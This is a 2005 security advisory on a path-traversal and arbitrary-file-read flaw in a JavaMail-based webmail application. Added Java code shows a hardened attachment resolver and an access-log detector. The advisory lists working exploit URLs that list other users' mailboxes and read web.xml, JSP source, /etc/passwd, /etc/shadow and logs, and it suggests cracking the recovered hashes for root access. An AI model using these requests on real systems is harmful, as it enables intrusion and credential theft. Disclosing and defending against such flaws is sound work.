
Javamail Multiple Information Disclosure Vulnerabilities


May 25, 2005 Yangon, Myanmar.

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

ReadMessage.jsp fails to restrict access to other directories and files. The attachment block of the page looks like this:

File Name: <%=mp.getFileName()%><br>
Type: <%=abc.getContent_Type()%><br>
Size: <%=abc.getMsgSize()/1024%>Kb<br>
<a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>

The download link is built from the attachment's full server-side path:

<%=abc.getFilePath() + "/" + abc.getFileName() %>

That path is handed to docdownloadfile.jsp in the f parameter, and the server then serves whatever path it is given. An attacker who edits f can therefore read any file the servlet container process is able to read.
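The lookup behind such a download handler, in its vulnerable and hardened forms, as an added example that is not code from the advisory or from JavaMail or the webmail application it describes. The class, method and parameter names (AttachmentResolver, resolveUnsafe, resolveSafe, mailboxRoot, messageId) and the user name user@example.com are assumptions; the directory layout <mailboxRoot>/<user>/<messageId>/<fileName> follows the URLs quoted in the advisory.

```java
import java.nio.file.Path;
import java.nio.file.Paths;

/*
 * Added example, not code from the advisory or from JavaMail / the webmail
 * application it describes. Class, method and parameter names are assumptions;
 * the layout <mailboxRoot>/<user>/<messageId>/<fileName> follows the URLs quoted
 * in the advisory.
 */
public final class AttachmentResolver {

    /* Mirrors the vulnerable behaviour: the client-supplied path is served as-is. */
    public static Path resolveUnsafe(String f) {
        return Paths.get(f).normalize();
    }

    /*
     * Hardened lookup. The client supplies only a message id and a file name;
     * the mailbox comes from the authenticated session, never from the request.
     */
    public static Path resolveSafe(Path mailboxRoot, String authenticatedUser,
                                   String messageId, String fileName) {
        if (authenticatedUser == null || messageId == null || fileName == null) {
            throw new IllegalArgumentException("missing parameter");
        }
        // Refuse separators and dot components outright rather than trying to
        // sanitise them: legitimate ids and file names never contain them.
        for (String part : new String[] {authenticatedUser, messageId, fileName}) {
            if (part.isEmpty() || part.contains("/") || part.contains("\\")
                    || part.equals(".") || part.equals("..")) {
                throw new IllegalArgumentException("invalid path component: " + part);
            }
        }
        Path base = mailboxRoot.toAbsolutePath().normalize().resolve(authenticatedUser);
        Path candidate = base.resolve(messageId).resolve(fileName).normalize();
        // Containment check: after normalisation the candidate must still lie
        // inside this user's own mailbox directory.
        if (!candidate.startsWith(base)) {
            throw new SecurityException("path escapes mailbox: " + candidate);
        }
        return candidate;
    }

    public static void main(String[] args) {
        Path root = Paths.get("/var/serviceprovider/web/mailboxesdir");

        // Vulnerable: the attacker chooses the whole path.
        System.out.println(resolveUnsafe("/etc/passwd"));
        System.out.println(resolveUnsafe("/var/serviceprovider/web/WEB-INF/web.xml"));

        // Hardened: the legitimate attachment of the logged-in user resolves.
        System.out.println(resolveSafe(root, "user@example.com",
                "messageid123@user", "filename.extension"));

        // Hardened: attempts to reach another mailbox or leave the tree are refused.
        String[][] attempts = {
            {"../user2@example.com", "filename.extension"},
            {"messageid123@user", "../../../../etc/passwd"},
            {"..", "web.xml"},
        };
        for (String[] a : attempts) {
            try {
                resolveSafe(root, "user@example.com", a[0], a[1]);
            } catch (IllegalArgumentException | SecurityException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

The hardened variant never accepts a filesystem path from the client: it takes a message id and a file name, resolves them under the mailbox of the user recorded in the session, and rejects separators and dot components before the containment check, so neither another user's mailbox nor anything outside mailboxesdir can be named. Path.normalize() does not follow symbolic links, so on a real deployment also confirm the file exists and compare its toRealPath() against the real path of the mailbox root.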

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information

1. Open specific mailbox attachment

When a user downloads a message attachment through the webmail interface, the attacker can observe a URL of the form

http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user/filename.extension

The path in f shows that mailboxes are stored under /var/serviceprovider/web, which is the web application's own document root. The author first tried to reach the folder with the full filesystem path:

http://example.com/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user

That returned errors. Dropping the filesystem prefix and requesting the directory relative to the web root worked:

http://example.com/mailboxesdir/user@xxxxxxxxxxx/

It returns a directory listing of the attachments stored for user@xxxxxxxxxxx.

No authentication is required: because the mailboxes live inside the document root, an attacker only needs a valid username to list (and fetch) that mailbox's attachments:

http://example.com/mailboxesdir/user2@xxxxxxxxxxx/

http://example.com/mailboxesdir/user3@xxxxxxxxxxx/


2. Download .jsp source code and configuration information of javamail

docdownloadfile.jsp does not serve the file itself; it redirects the browser to a Download servlet, passing the server-side path of the file in the query string. The browser ends up at

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user@xxxxxxxxxxx/messageid123@user/filename.extension

The servlet serves whatever path it is given, so the same request form fetches the web application's deployment descriptor:

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml

which contains the configuration of the javamail web application. The container never serves files under WEB-INF directly, but here they are read from disk and returned by the servlet.

The JSP source of the application's pages can be downloaded the same way. This bypasses JSP compilation, so the server-side code (and anything hard-coded in it) is exposed:

http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp




3. Target machine Root/Admin Compromise

On Unix systems /etc/passwd holds the account list and /etc/shadow the password hashes. Out of curiosity the author requested them through the same servlet:

http://example.com/Download?/etc/passwd

An example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

The password hashes can then be cracked offline with John the Ripper, which is freely available (for example, search for 'john the ripper' on altavista.com).

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

Note that /etc/shadow is readable only by root on a correctly configured system, so obtaining it through the web application also shows that the servlet container is running with root privileges; a container running as an unprivileged user would still leak /etc/passwd, but the shadow read would fail.

http://example.com/Download?/etc/group
/etc/group file:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:


Once the attacker has recovered the root or administrator password of the target server, any further attack follows: website defacement, database alteration, data theft and more.

4. Download server information

Log files readable by the container process are exposed the same way, for example:

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog

and so on.
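Detection logic for the four steps above, as an added example that is not part of the advisory: it scans access-log lines for Download requests whose path lies outside the mailbox tree or contains traversal, and for direct browsing of /mailboxesdir/. The log lines are constructed for this example (Tomcat's common log format with the full request line); the class and method names and the host 10.0.0.x addresses are assumptions.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/*
 * Added example, not part of the advisory. Scans access-log lines for the
 * request patterns the advisory describes. Sample lines are constructed.
 */
public final class DownloadAbuseDetector {

    /* Constructed sample lines in common log format; not from any real server. */
    static final String[] SAMPLE_LOG = {
        "10.0.0.5 - - [25/May/2005:10:01:12 +0630] \"GET /Download?/var/serviceprovider/web/mailboxesdir/user@example.com/messageid123@user/filename.extension HTTP/1.1\" 200 4132",
        "10.0.0.5 - - [25/May/2005:10:02:40 +0630] \"GET /Download?/var/serviceprovider/web/WEB-INF/web.xml HTTP/1.1\" 200 2210",
        "10.0.0.5 - - [25/May/2005:10:03:07 +0630] \"GET /Download?/etc/passwd HTTP/1.1\" 200 901",
        "10.0.0.5 - - [25/May/2005:10:03:30 +0630] \"GET /Download?/var/serviceprovider/web/mailboxesdir/../WEB-INF/web.xml HTTP/1.1\" 200 2210",
        "10.0.0.9 - - [25/May/2005:10:03:55 +0630] \"GET /mailboxesdir/user2@example.com/ HTTP/1.1\" 200 1780",
        "10.0.0.9 - - [25/May/2005:10:04:10 +0630] \"GET /login.jsp HTTP/1.1\" 200 1200",
    };

    /* Extracts the request target from the quoted request line. */
    static final Pattern REQUEST = Pattern.compile("\"(?:GET|POST) ([^ \"]+) HTTP/");

    /* Only paths below this directory are legitimate attachment downloads. */
    static final String MAILBOX_ROOT = "/var/serviceprovider/web/mailboxesdir/";
    static final String DOWNLOAD_PREFIX = "/Download?";

    /* Returns the request targets that should raise an alert. */
    public static List<String> suspicious(String[] lines) {
        List<String> hits = new ArrayList<>();
        for (String line : lines) {
            Matcher m = REQUEST.matcher(line);
            if (!m.find()) {
                continue;
            }
            String target = m.group(1);
            if (target.startsWith(DOWNLOAD_PREFIX)) {
                String path = target.substring(DOWNLOAD_PREFIX.length());
                // A served path outside the mailbox tree, or one that climbs out
                // of it with "..", is abuse of the arbitrary-file-read.
                if (!path.startsWith(MAILBOX_ROOT) || path.contains("/../")) {
                    hits.add(target);
                }
            } else if (target.startsWith("/mailboxesdir/")) {
                // Mailbox directories should never be browsed through the web root.
                hits.add(target);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        for (String hit : suspicious(SAMPLE_LOG)) {
            System.out.println("ALERT " + hit);
        }
    }
}
```

Run against the sample lines, the detector flags the WEB-INF, /etc/passwd, traversal and directory-listing requests and leaves the legitimate attachment download and login.jsp alone. Before matching real logs, percent-decode the request target, since an attacker can write the same traversal as %2e%2e%2f; and treat a single client issuing many Download requests for distinct non-mailbox paths as one incident rather than separate alerts.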

By 
Thet Aung Min Latt thetaung@xxxxxxxxx
http://thetaung.amyanmar.com